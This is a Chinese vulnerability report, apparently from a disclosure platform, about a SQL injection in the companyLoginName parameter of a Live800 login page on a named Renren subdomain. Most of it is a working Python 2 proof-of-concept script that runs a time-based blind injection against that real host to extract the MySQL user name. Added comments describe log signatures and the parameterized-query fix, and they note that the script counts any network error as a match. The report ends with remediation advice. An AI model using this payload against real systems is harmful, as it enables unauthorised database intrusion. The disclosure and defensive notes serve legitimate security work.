人人网某站 SQL 注入漏洞

最近 live800 好像很火，就在乌云上搜索了一下。注入点：https://live800.wan.renren.com/live800/loginAction.jsp?companyLoginName=1*&loginName=a111&password=111 （live800 客服系统，* 标记的是 companyLoginName 参数中的注入位置）。这套系统已经被大牛爆过很多洞。找了个 lijiejie 的脚本，刚开始一直不行，报 incomplete format 之类的异常，折腾了一会儿才调通。弄完脚本瞬间感觉高富帅了，哈哈，求首页啊。


import httplib
import time
import string
import sys
import random
import urllib
# Proof-of-concept from the report: time-based blind SQL injection through the
# companyLoginName parameter of /live800/loginAction.jsp. It reads the value of
# MySQL user() one character at a time, using a request timeout as the signal.
#
# Defender notes:
#  - The parameter presumably reaches a SQL statement by string concatenation;
#    the durable fix is a parameterized query for this login lookup.
#  - In access logs this shows up as a burst of GET requests to loginAction.jsp
#    whose companyLoginName contains if( / sleep( / ascii(mid( fragments, some
#    of which take 3 seconds or longer to answer.
#
# NOTE(review): this is Python 2 code (print statement, "except Exception,e").
headers = {}  # never used below
# Candidate characters, tried in this order for every position.
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
# Positions 1..20: at most 20 characters are collected, and the loop does not
# stop early when no candidate matches a position.
for i in range(1, 21):
    for payload in payloads:
        try:
            # True when character i of lower(user()) equals the candidate.
            s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))
            # A true condition makes the database call sleep(3); false yields 0.
            s = "1'XOR(if(%s,sleep(3),0))OR'1" % s
            # Client timeout equals the sleep length, so a delayed answer
            # surfaces as an exception instead of a response.
            conn = httplib.HTTPConnection('live800.wan.renren.com', timeout=3)
            conn.request(method='GET',url="/live800/loginAction.jsp?companyLoginName=1%s&loginName=a111&password=111" % urllib.quote(s))
            # The response itself is discarded; only its arrival in time matters.
            conn.getresponse()
            conn.close()
            print '.',
        except Exception,e:
            # Any exception, not only a timeout, is counted as a match, so an
            # unrelated network error is recorded as a character: the reported
            # value is unverified. The connection is not closed on this path.
            print e
            user += payload
            print '\n[in progress]', user,
            # Pause before the next position - presumably to let the
            # server-side sleep finish; confirm.
            time.sleep(3.0)
            break
print '\n[Done] MySQL user is %s' % user
解决方案:
升级 live800 客服系统到厂商提供的修复版本；升级之前，应确保 loginAction.jsp 对 companyLoginName 等登录参数使用参数化查询，而不是拼接 SQL。